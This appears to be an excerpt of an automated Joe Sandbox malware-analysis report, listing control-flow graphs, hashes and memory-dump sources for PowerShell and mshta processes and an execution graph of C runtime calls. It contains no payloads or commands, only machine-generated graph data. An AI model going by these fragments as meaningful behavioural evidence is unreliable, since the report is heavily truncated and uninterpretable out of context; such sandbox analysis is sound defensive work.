                                                                                                                                                                                control_flow_graph 567 7fe89a84b89-7fe89a84b9f 568 7fe89a84bb9-7fe89a84bbf 567->568 569 7fe89a84ba1-7fe89a84baf 567->569 570 7fe89a84cbe-7fe89a84cc8 568->570 571 7fe89a84bc5-7fe89a84bc8 568->571 569->568 572 7fe89a84bb1-7fe89a84bb7 569->572 575 7fe89a84cdb-7fe89a84ceb 570->575 576 7fe89a84cca-7fe89a84cda 570->576 573 7fe89a84bca-7fe89a84bdd 571->573 574 7fe89a84c11 571->574 572->568 585 7fe89a84d29-7fe89a84dd1 573->585 586 7fe89a84be3-7fe89a84bed 573->586 580 7fe89a84c13-7fe89a84c15 574->580 578 7fe89a84cf8-7fe89a84d26 575->578 579 7fe89a84ced-7fe89a84cf1 575->579 578->585 579->578 580->570 582 7fe89a84c1b-7fe89a84c1e 580->582 582->570 583 7fe89a84c24-7fe89a84c27 582->583 583->570 587 7fe89a84c2d-7fe89a84c6b 583->587 607 7fe89a84ddd-7fe89a84de9 585->607 608 7fe89a84dd3-7fe89a84dd9 585->608 588 7fe89a84c06-7fe89a84c0f 586->588 589 7fe89a84bef-7fe89a84bfc 586->589 587->570 596 7fe89a84c6d-7fe89a84c73 587->596 588->580 589->588 591 7fe89a84bfe-7fe89a84c04 589->591 591->588 598 7fe89a84c92-7fe89a84ca8 596->598 599 7fe89a84c75-7fe89a84c82 596->599 602 7fe89a84cae-7fe89a84cbd 598->602 599->598 600 7fe89a84c84-7fe89a84c90 599->600 600->598 609 7fe89a84deb-7fe89a84df1 607->609 610 7fe89a84df5-7fe89a84e17 607->610 608->607 609->610
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532872591.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: P*\
                                                                                                                                                                                • API String ID: 0-3285566512
                                                                                                                                                                                • Opcode ID: 393d42956e2e59ab422a21999eaf1a792f95ce0602d6287be9bf4f4f06f0b614
                                                                                                                                                                                • Instruction ID: f0cbfe415db7e425cc2c2b4d2d39bc37b480e3d27cb96b3f47ab46ea3c830a5b
                                                                                                                                                                                • Opcode Fuzzy Hash: 393d42956e2e59ab422a21999eaf1a792f95ce0602d6287be9bf4f4f06f0b614
                                                                                                                                                                                • Instruction Fuzzy Hash: 04915A20A0DBC90FE74AE72C58157797FD1EF86654F1801EED08ED71A3DA18AC16C392
                                                                                                                                                                                Function 000007FE89A846D0 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 611 7fe89a846d0-7fe89a846d8 612 7fe89a846da-7fe89a846f4 611->612 613 7fe89a84710-7fe89a84719 611->613 620 7fe89a846f6-7fe89a84701 612->620 621 7fe89a84740-7fe89a8474a 612->621 614 7fe89a8471b-7fe89a84728 613->614 615 7fe89a84732-7fe89a8473f 613->615 614->615 616 7fe89a8472a-7fe89a84730 614->616 616->615 622 7fe89a84708-7fe89a84709 620->622 623 7fe89a84759-7fe89a84769 621->623 624 7fe89a8474c-7fe89a84758 621->624 622->613 625 7fe89a84776-7fe89a8479c 623->625 626 7fe89a8476b-7fe89a8476f 623->626 626->625
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532872591.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: r6R
                                                                                                                                                                                • API String ID: 0-3430837693
                                                                                                                                                                                • Opcode ID: f4c8ec7059c3b8bb329152888139eade80e4765ecbb636e56f4f66e00488fe9d
                                                                                                                                                                                • Instruction ID: 167890aec91a143c6a286427248b63ce743339c62da1d1c3a26d11d0a0259ad6
                                                                                                                                                                                • Opcode Fuzzy Hash: f4c8ec7059c3b8bb329152888139eade80e4765ecbb636e56f4f66e00488fe9d
                                                                                                                                                                                • Instruction Fuzzy Hash: E8212931F0CA994FEB55A32C64113F9B7D2EB89650F1401F7C15EE32A6DA19BC118390
                                                                                                                                                                                Function 000007FE89A846F1 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 628 7fe89a846f1-7fe89a84709 630 7fe89a84710-7fe89a84719 628->630 631 7fe89a8471b-7fe89a84728 630->631 632 7fe89a84732-7fe89a8473f 630->632 631->632 633 7fe89a8472a-7fe89a84730 631->633 633->632
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532872591.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: r6R
                                                                                                                                                                                • API String ID: 0-3430837693
                                                                                                                                                                                • Opcode ID: cac50ac4a843fd07dd0fac8b702fe4585f3d2c151b1a1060e116f4b4804476cf
                                                                                                                                                                                • Instruction ID: 72c3204d6141fa0aafc81e27b1be0195d45e2150ba09e4e73d25d5f3091efa84
                                                                                                                                                                                • Opcode Fuzzy Hash: cac50ac4a843fd07dd0fac8b702fe4585f3d2c151b1a1060e116f4b4804476cf
                                                                                                                                                                                • Instruction Fuzzy Hash: C6F0E931E1D9D90EF795A32C24052F47AD1EF4A551F5401F6C59DE3263D9146C144380

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 029A0FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000003.470349869.00000000029A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_3_29a0000_mshta.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                • Instruction ID: 33d59082bbd617b1ba2246b47c9e786cd9cfebc9f9b4f63aae67282667174bb2
                                                                                                                                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                Function 029A0FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000003.470349869.00000000029A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_3_29a0000_mshta.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                • Instruction ID: 33d59082bbd617b1ba2246b47c9e786cd9cfebc9f9b4f63aae67282667174bb2
                                                                                                                                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                Function 029A0FA9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000003.470349869.00000000029A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_3_29a0000_mshta.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                • Instruction ID: 33d59082bbd617b1ba2246b47c9e786cd9cfebc9f9b4f63aae67282667174bb2
                                                                                                                                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                Function 029A0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000003.470349869.00000000029A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_3_29a0000_mshta.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                • Instruction ID: 33d59082bbd617b1ba2246b47c9e786cd9cfebc9f9b4f63aae67282667174bb2
                                                                                                                                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                • Instruction Fuzzy Hash:

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:6.6%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:2.6%
                                                                                                                                                                                Total number of Nodes:1687
                                                                                                                                                                                Total number of Limit Nodes:24
                                                                                                                                                                                execution_graph 7050 10008640 7053 10008657 7050->7053 7054 10008665 7053->7054 7055 10008679 7053->7055 7056 10006368 _free 19 API calls 7054->7056 7057 10008681 7055->7057 7058 10008693 7055->7058 7059 1000866a 7056->7059 7060 10006368 _free 19 API calls 7057->7060 7063 100054a7 __fassign 36 API calls 7058->7063 7065 10008652 7058->7065 7061 100062ac _abort 25 API calls 7059->7061 7062 10008686 7060->7062 7061->7065 7064 100062ac _abort 25 API calls 7062->7064 7063->7065 7064->7065 7621 10007a80 7622 10007a8d 7621->7622 7623 1000637b _abort 19 API calls 7622->7623 7624 10007aa7 7623->7624 7625 1000571e _free 19 API calls 7624->7625 7626 10007ab3 7625->7626 7627 1000637b _abort 19 API calls 7626->7627 7631 10007ad9 7626->7631 7629 10007acd 7627->7629 7628 10005eb7 10 API calls 7628->7631 7630 1000571e _free 19 API calls 7629->7630 7630->7631 7631->7628 7632 10007ae5 7631->7632 6961 10007103 GetCommandLineA GetCommandLineW 6962 10005303 6965 100050a5 6962->6965 6974 1000502f 6965->6974 6968 1000502f 5 API calls 6969 100050c3 6968->6969 6978 10005000 6969->6978 6972 10005000 19 API calls 6973 100050d9 6972->6973 6975 10005048 6974->6975 6976 10002ada _ValidateLocalCookies 5 API calls 6975->6976 6977 10005069 6976->6977 6977->6968 6979 1000502a 6978->6979 6980 1000500d 6978->6980 6979->6972 6981 10005024 6980->6981 6982 1000571e _free 19 API calls 6980->6982 6983 1000571e _free 19 API calls 6981->6983 6982->6980 6983->6979 7066 1000af43 7067 1000af59 7066->7067 7068 1000af4d 7066->7068 7068->7067 7069 1000af52 CloseHandle 7068->7069 7069->7067 7070 1000a945 7072 1000a96d 7070->7072 7071 1000a9a5 7072->7071 7073 1000a997 7072->7073 7074 1000a99e 7072->7074 7079 1000aa17 7073->7079 7083 1000aa00 7074->7083 7080 1000aa20 7079->7080 7087 1000b19b 7080->7087 7084 1000aa20 7083->7084 7085 1000b19b __startOneArgErrorHandling 20 API calls 7084->7085 7086 1000a9a3 7085->7086 7088 1000b1da __startOneArgErrorHandling 7087->7088 7092 1000b25c __startOneArgErrorHandling 7088->7092 7097 1000b59e 7088->7097 7090 1000b286 7093 1000b292 7090->7093 7104 1000b8b2 7090->7104 7092->7090 7100 100078a3 7092->7100 7095 10002ada _ValidateLocalCookies 5 API calls 7093->7095 7096 1000a99c 7095->7096 7111 1000b5c1 7097->7111 7101 100078cb 7100->7101 7102 10002ada _ValidateLocalCookies 5 API calls 7101->7102 7103 100078e8 7102->7103 7103->7090 7105 1000b8d4 7104->7105 7106 1000b8bf 7104->7106 7108 10006368 _free 19 API calls 7105->7108 7107 1000b8d9 7106->7107 7109 10006368 _free 19 API calls 7106->7109 7107->7093 7108->7107 7110 1000b8cc 7109->7110 7110->7093 7112 1000b5ec __raise_exc 7111->7112 7113 1000b7e5 RaiseException 7112->7113 7114 1000b5bc 7113->7114 7114->7092 7728 1000a1c6 IsProcessorFeaturePresent 7729 10007bc7 7730 10007bd3 ___DestructExceptionObject 7729->7730 7731 10007c0a _abort 7730->7731 7737 10005671 RtlEnterCriticalSection 7730->7737 7733 10007be7 7734 10007f86 __fassign 19 API calls 7733->7734 7735 10007bf7 7734->7735 7738 10007c10 7735->7738 7737->7733 7741 100056b9 RtlLeaveCriticalSection 7738->7741 7740 10007c17 7740->7731 7741->7740 7115 10005348 7116 10003529 ___vcrt_uninitialize 7 API calls 7115->7116 7117 1000534f 7116->7117 7118 10007b48 7128 10008ebf 7118->7128 7122 10007b55 7141 1000907c 7122->7141 7125 10007b7f 7126 1000571e _free 19 API calls 7125->7126 7127 10007b8a 7126->7127 7145 10008ec8 7128->7145 7130 10007b50 7131 10008fdc 7130->7131 7132 10008fe8 ___DestructExceptionObject 7131->7132 7165 10005671 RtlEnterCriticalSection 7132->7165 7134 1000905e 7179 10009073 7134->7179 7136 10008ff3 7136->7134 7137 10009032 RtlDeleteCriticalSection 7136->7137 7166 1000a09c 7136->7166 7140 1000571e _free 19 API calls 7137->7140 7138 1000906a _abort 7138->7122 7140->7136 7142 10009092 7141->7142 7143 10007b64 RtlDeleteCriticalSection 7141->7143 7142->7143 7144 1000571e _free 19 API calls 7142->7144 7143->7122 7143->7125 7144->7143 7146 10008ed4 ___DestructExceptionObject 7145->7146 7155 10005671 RtlEnterCriticalSection 7146->7155 7148 10008f77 7160 10008f97 7148->7160 7152 10008f83 _abort 7152->7130 7153 10008e78 63 API calls 7154 10008ee3 7153->7154 7154->7148 7154->7153 7156 10007b94 RtlEnterCriticalSection 7154->7156 7157 10008f6d 7154->7157 7155->7154 7156->7154 7163 10007ba8 RtlLeaveCriticalSection 7157->7163 7159 10008f75 7159->7154 7164 100056b9 RtlLeaveCriticalSection 7160->7164 7162 10008f9e 7162->7152 7163->7159 7164->7162 7165->7136 7167 1000a0a8 ___DestructExceptionObject 7166->7167 7168 1000a0b9 7167->7168 7169 1000a0ce 7167->7169 7170 10006368 _free 19 API calls 7168->7170 7178 1000a0c9 _abort 7169->7178 7182 10007b94 RtlEnterCriticalSection 7169->7182 7171 1000a0be 7170->7171 7173 100062ac _abort 25 API calls 7171->7173 7173->7178 7174 1000a0ea 7183 1000a026 7174->7183 7176 1000a0f5 7199 1000a112 7176->7199 7178->7136 7447 100056b9 RtlLeaveCriticalSection 7179->7447 7181 1000907a 7181->7138 7182->7174 7184 1000a033 7183->7184 7186 1000a048 7183->7186 7185 10006368 _free 19 API calls 7184->7185 7187 1000a038 7185->7187 7191 1000a043 7186->7191 7202 10008e12 7186->7202 7189 100062ac _abort 25 API calls 7187->7189 7189->7191 7191->7176 7192 1000907c 19 API calls 7193 1000a064 7192->7193 7208 10007a5a 7193->7208 7195 1000a06a 7215 1000adce 7195->7215 7198 1000571e _free 19 API calls 7198->7191 7446 10007ba8 RtlLeaveCriticalSection 7199->7446 7201 1000a11a 7201->7178 7203 10008e26 7202->7203 7204 10008e2a 7202->7204 7203->7192 7204->7203 7205 10007a5a 25 API calls 7204->7205 7206 10008e4a 7205->7206 7230 10009a22 7206->7230 7209 10007a66 7208->7209 7210 10007a7b 7208->7210 7211 10006368 _free 19 API calls 7209->7211 7210->7195 7212 10007a6b 7211->7212 7213 100062ac _abort 25 API calls 7212->7213 7214 10007a76 7213->7214 7214->7195 7216 1000addd 7215->7216 7217 1000adf2 7215->7217 7219 10006355 __dosmaperr 19 API calls 7216->7219 7218 1000ae2d 7217->7218 7222 1000ae19 7217->7222 7220 10006355 __dosmaperr 19 API calls 7218->7220 7221 1000ade2 7219->7221 7223 1000ae32 7220->7223 7224 10006368 _free 19 API calls 7221->7224 7403 1000ada6 7222->7403 7226 10006368 _free 19 API calls 7223->7226 7227 1000a070 7224->7227 7228 1000ae3a 7226->7228 7227->7191 7227->7198 7229 100062ac _abort 25 API calls 7228->7229 7229->7227 7231 10009a2e ___DestructExceptionObject 7230->7231 7232 10009a36 7231->7232 7233 10009a4e 7231->7233 7255 10006355 7232->7255 7235 10009aec 7233->7235 7239 10009a83 7233->7239 7237 10006355 __dosmaperr 19 API calls 7235->7237 7240 10009af1 7237->7240 7238 10006368 _free 19 API calls 7251 10009a43 _abort 7238->7251 7258 10008c7b RtlEnterCriticalSection 7239->7258 7242 10006368 _free 19 API calls 7240->7242 7244 10009af9 7242->7244 7243 10009a89 7245 10009aa5 7243->7245 7246 10009aba 7243->7246 7247 100062ac _abort 25 API calls 7244->7247 7248 10006368 _free 19 API calls 7245->7248 7259 10009b0d 7246->7259 7247->7251 7250 10009aaa 7248->7250 7253 10006355 __dosmaperr 19 API calls 7250->7253 7251->7203 7252 10009ab5 7310 10009ae4 7252->7310 7253->7252 7256 10005b7a __dosmaperr 19 API calls 7255->7256 7257 1000635a 7256->7257 7257->7238 7258->7243 7260 10009b3b 7259->7260 7297 10009b34 7259->7297 7261 10009b5e 7260->7261 7262 10009b3f 7260->7262 7266 10009baf 7261->7266 7267 10009b92 7261->7267 7263 10006355 __dosmaperr 19 API calls 7262->7263 7265 10009b44 7263->7265 7264 10002ada _ValidateLocalCookies 5 API calls 7268 10009d15 7264->7268 7269 10006368 _free 19 API calls 7265->7269 7276 10009bc5 7266->7276 7313 1000a00b 7266->7313 7270 10006355 __dosmaperr 19 API calls 7267->7270 7268->7252 7271 10009b4b 7269->7271 7274 10009b97 7270->7274 7275 100062ac _abort 25 API calls 7271->7275 7278 10006368 _free 19 API calls 7274->7278 7275->7297 7316 100096b2 7276->7316 7281 10009b9f 7278->7281 7279 10009bd3 7284 10009bd7 7279->7284 7285 10009bf9 7279->7285 7280 10009c0c 7282 10009c20 7280->7282 7283 10009c66 WriteFile 7280->7283 7286 100062ac _abort 25 API calls 7281->7286 7289 10009c56 7282->7289 7290 10009c28 7282->7290 7287 10009c89 GetLastError 7283->7287 7292 10009bef 7283->7292 7291 10009ccd 7284->7291 7323 10009645 7284->7323 7328 10009492 GetConsoleCP 7285->7328 7286->7297 7287->7292 7354 10009728 7289->7354 7293 10009c46 7290->7293 7294 10009c2d 7290->7294 7291->7297 7298 10006368 _free 19 API calls 7291->7298 7292->7291 7292->7297 7301 10009ca9 7292->7301 7346 100098f5 7293->7346 7294->7291 7339 10009807 7294->7339 7297->7264 7300 10009cf2 7298->7300 7303 10006355 __dosmaperr 19 API calls 7300->7303 7304 10009cb0 7301->7304 7305 10009cc4 7301->7305 7303->7297 7306 10006368 _free 19 API calls 7304->7306 7361 10006332 7305->7361 7308 10009cb5 7306->7308 7309 10006355 __dosmaperr 19 API calls 7308->7309 7309->7297 7402 10008c9e RtlLeaveCriticalSection 7310->7402 7312 10009aea 7312->7251 7366 10009f8d 7313->7366 7388 10008dbc 7316->7388 7318 100096c2 7319 100096c7 7318->7319 7320 10005af6 _abort 36 API calls 7318->7320 7319->7279 7319->7280 7321 100096ea 7320->7321 7321->7319 7322 10009708 GetConsoleMode 7321->7322 7322->7319 7325 1000969f 7323->7325 7327 1000966a 7323->7327 7324 100096a1 GetLastError 7324->7325 7325->7292 7326 1000a181 WriteConsoleW 7326->7327 7327->7324 7327->7325 7327->7326 7336 100094f5 7328->7336 7338 10009607 7328->7338 7329 10002ada _ValidateLocalCookies 5 API calls 7330 10009641 7329->7330 7330->7292 7332 100079e6 38 API calls __fassign 7332->7336 7333 1000957b WideCharToMultiByte 7334 100095a1 WriteFile 7333->7334 7333->7338 7335 1000962a GetLastError 7334->7335 7334->7336 7335->7338 7336->7332 7336->7333 7337 100095d2 WriteFile 7336->7337 7336->7338 7397 10007c19 7336->7397 7337->7335 7337->7336 7338->7329 7340 10009816 7339->7340 7341 100098d8 7340->7341 7342 10009894 WriteFile 7340->7342 7343 10002ada _ValidateLocalCookies 5 API calls 7341->7343 7342->7340 7345 100098da GetLastError 7342->7345 7344 100098f1 7343->7344 7344->7292 7345->7341 7351 10009904 7346->7351 7347 10009a0f 7348 10002ada _ValidateLocalCookies 5 API calls 7347->7348 7350 10009a1e 7348->7350 7349 10009986 WideCharToMultiByte 7352 10009a07 GetLastError 7349->7352 7353 100099bb WriteFile 7349->7353 7350->7292 7351->7347 7351->7349 7351->7353 7352->7347 7353->7351 7353->7352 7358 10009737 7354->7358 7355 100097ea 7357 10002ada _ValidateLocalCookies 5 API calls 7355->7357 7356 100097a9 WriteFile 7356->7358 7359 100097ec GetLastError 7356->7359 7360 10009803 7357->7360 7358->7355 7358->7356 7359->7355 7360->7292 7362 10006355 __dosmaperr 19 API calls 7361->7362 7363 1000633d _free 7362->7363 7364 10006368 _free 19 API calls 7363->7364 7365 10006350 7364->7365 7365->7297 7375 10008d52 7366->7375 7368 10009f9f 7369 10009fa7 7368->7369 7370 10009fb8 SetFilePointerEx 7368->7370 7371 10006368 _free 19 API calls 7369->7371 7372 10009fd0 GetLastError 7370->7372 7373 10009fac 7370->7373 7371->7373 7374 10006332 __dosmaperr 19 API calls 7372->7374 7373->7276 7374->7373 7376 10008d5f 7375->7376 7377 10008d74 7375->7377 7378 10006355 __dosmaperr 19 API calls 7376->7378 7380 10006355 __dosmaperr 19 API calls 7377->7380 7382 10008d99 7377->7382 7379 10008d64 7378->7379 7381 10006368 _free 19 API calls 7379->7381 7383 10008da4 7380->7383 7384 10008d6c 7381->7384 7382->7368 7385 10006368 _free 19 API calls 7383->7385 7384->7368 7386 10008dac 7385->7386 7387 100062ac _abort 25 API calls 7386->7387 7387->7384 7389 10008dc9 7388->7389 7391 10008dd6 7388->7391 7390 10006368 _free 19 API calls 7389->7390 7394 10008dce 7390->7394 7392 10008de2 7391->7392 7393 10006368 _free 19 API calls 7391->7393 7392->7318 7395 10008e03 7393->7395 7394->7318 7396 100062ac _abort 25 API calls 7395->7396 7396->7394 7398 10005af6 _abort 36 API calls 7397->7398 7399 10007c24 7398->7399 7400 10007a00 __fassign 36 API calls 7399->7400 7401 10007c34 7400->7401 7401->7336 7402->7312 7406 1000ad24 7403->7406 7405 1000adca 7405->7227 7407 1000ad30 ___DestructExceptionObject 7406->7407 7417 10008c7b RtlEnterCriticalSection 7407->7417 7409 1000ad3e 7410 1000ad70 7409->7410 7411 1000ad65 7409->7411 7412 10006368 _free 19 API calls 7410->7412 7418 1000ae4d 7411->7418 7414 1000ad6b 7412->7414 7433 1000ad9a 7414->7433 7416 1000ad8d _abort 7416->7405 7417->7409 7419 10008d52 25 API calls 7418->7419 7422 1000ae5d 7419->7422 7420 1000ae63 7436 10008cc1 7420->7436 7422->7420 7423 1000ae95 7422->7423 7424 10008d52 25 API calls 7422->7424 7423->7420 7425 10008d52 25 API calls 7423->7425 7427 1000ae8c 7424->7427 7428 1000aea1 CloseHandle 7425->7428 7430 10008d52 25 API calls 7427->7430 7428->7420 7431 1000aead GetLastError 7428->7431 7429 1000aedd 7429->7414 7430->7423 7431->7420 7432 10006332 __dosmaperr 19 API calls 7432->7429 7445 10008c9e RtlLeaveCriticalSection 7433->7445 7435 1000ada4 7435->7416 7437 10008cd0 7436->7437 7438 10008d37 7436->7438 7437->7438 7442 10008cfa 7437->7442 7439 10006368 _free 19 API calls 7438->7439 7440 10008d3c 7439->7440 7441 10006355 __dosmaperr 19 API calls 7440->7441 7443 10008d27 7441->7443 7442->7443 7444 10008d21 SetStdHandle 7442->7444 7443->7429 7443->7432 7444->7443 7445->7435 7446->7201 7447->7181 7448 10002049 7449 10002055 ___DestructExceptionObject 7448->7449 7450 100020d3 7449->7450 7451 1000207d 7449->7451 7461 1000205e 7449->7461 7453 10002639 ___scrt_fastfail 4 API calls 7450->7453 7462 1000244c 7451->7462 7455 100020da 7453->7455 7454 10002082 7471 10002308 7454->7471 7457 10002087 __RTC_Initialize 7474 100020c4 7457->7474 7459 1000209f 7477 1000260b 7459->7477 7463 10002451 ___scrt_release_startup_lock 7462->7463 7464 10002455 7463->7464 7466 10002461 7463->7466 7465 1000527a _abort 19 API calls 7464->7465 7467 1000245f 7465->7467 7468 1000246e 7466->7468 7469 1000499b _abort 26 API calls 7466->7469 7467->7454 7468->7454 7470 10004bbd 7469->7470 7470->7454 7483 100034c7 RtlInterlockedFlushSList 7471->7483 7473 10002312 7473->7457 7485 1000246f 7474->7485 7476 100020c9 ___scrt_release_startup_lock 7476->7459 7478 10002617 7477->7478 7479 1000262d 7478->7479 7493 100053ed 7478->7493 7479->7461 7482 10003529 ___vcrt_uninitialize 7 API calls 7482->7479 7484 100034d7 7483->7484 7484->7473 7490 100053ff 7485->7490 7488 1000391b ___vcrt_uninitialize_ptd 5 API calls 7489 1000354d 7488->7489 7489->7476 7491 10005c2b 10 API calls 7490->7491 7492 10002476 7491->7492 7492->7488 7496 100074da 7493->7496 7499 100074f3 7496->7499 7497 10002ada _ValidateLocalCookies 5 API calls 7498 10002625 7497->7498 7498->7482 7499->7497 7633 10008a89 7636 10006d60 7633->7636 7637 10006d69 7636->7637 7638 10006d72 7636->7638 7639 10006c5f 49 API calls 7637->7639 7639->7638 6808 1000220c 6809 10002215 6808->6809 6810 1000221a dllmain_dispatch 6808->6810 6812 100022b1 6809->6812 6813 100022c7 6812->6813 6815 100022d0 6813->6815 6816 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6813->6816 6815->6810 6816->6815 7500 1000724e GetProcessHeap 7501 1000284f 7502 10002882 std::exception::exception 26 API calls 7501->7502 7503 1000285d 7502->7503 7644 10003c90 RtlUnwind 7742 100036d0 7743 100036e2 7742->7743 7745 100036f0 @_EH4_CallFilterFunc@8 7742->7745 7744 10002ada _ValidateLocalCookies 5 API calls 7743->7744 7744->7745 7504 10005351 7505 10005360 7504->7505 7506 10005374 7504->7506 7505->7506 7508 1000571e _free 19 API calls 7505->7508 7507 1000571e _free 19 API calls 7506->7507 7509 10005386 7507->7509 7508->7506 7510 1000571e _free 19 API calls 7509->7510 7511 10005399 7510->7511 7512 1000571e _free 19 API calls 7511->7512 7513 100053aa 7512->7513 7514 1000571e _free 19 API calls 7513->7514 7515 100053bb 7514->7515 7746 100073d5 7747 100073e1 ___DestructExceptionObject 7746->7747 7758 10005671 RtlEnterCriticalSection 7747->7758 7749 100073e8 7750 10008be3 26 API calls 7749->7750 7751 100073f7 7750->7751 7757 10007406 7751->7757 7759 10007269 GetStartupInfoW 7751->7759 7755 10007417 _abort 7770 10007422 7757->7770 7758->7749 7760 10007286 7759->7760 7761 10007318 7759->7761 7760->7761 7762 10008be3 26 API calls 7760->7762 7765 1000731f 7761->7765 7763 100072af 7762->7763 7763->7761 7764 100072dd GetFileType 7763->7764 7764->7763 7769 10007326 7765->7769 7766 10007369 GetStdHandle 7766->7769 7767 100073d1 7767->7757 7768 1000737c GetFileType 7768->7769 7769->7766 7769->7767 7769->7768 7773 100056b9 RtlLeaveCriticalSection 7770->7773 7772 10007429 7772->7755 7773->7772 7774 10004ed7 7775 10006d60 49 API calls 7774->7775 7776 10004ee9 7775->7776 7785 10007153 GetEnvironmentStringsW 7776->7785 7780 1000571e _free 19 API calls 7781 10004f29 7780->7781 7782 10004eff 7783 1000571e _free 19 API calls 7782->7783 7784 10004ef4 7783->7784 7784->7780 7786 100071bd 7785->7786 7787 1000716a 7785->7787 7789 100071c6 FreeEnvironmentStringsW 7786->7789 7790 10004eee 7786->7790 7788 10007170 WideCharToMultiByte 7787->7788 7788->7786 7791 1000718c 7788->7791 7789->7790 7790->7784 7797 10004f2f 7790->7797 7792 100056d0 20 API calls 7791->7792 7793 10007192 7792->7793 7794 100071af 7793->7794 7795 10007199 WideCharToMultiByte 7793->7795 7796 1000571e _free 19 API calls 7794->7796 7795->7794 7796->7786 7798 10004f44 7797->7798 7799 1000637b _abort 19 API calls 7798->7799 7809 10004f6b 7799->7809 7800 10004fcf 7801 1000571e _free 19 API calls 7800->7801 7802 10004fe9 7801->7802 7802->7782 7803 1000637b _abort 19 API calls 7803->7809 7804 10004fd1 7805 10005000 19 API calls 7804->7805 7807 10004fd7 7805->7807 7806 1000544d ___std_exception_copy 25 API calls 7806->7809 7808 1000571e _free 19 API calls 7807->7808 7808->7800 7809->7800 7809->7803 7809->7804 7809->7806 7810 10004ff3 7809->7810 7812 1000571e 